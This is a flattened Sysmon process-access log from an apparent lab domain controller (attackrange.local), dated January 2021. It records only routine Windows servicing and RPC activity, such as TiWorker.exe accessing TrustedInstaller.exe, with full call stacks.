13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.789{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.773{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.773{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.773{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.758{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.758{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.742{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51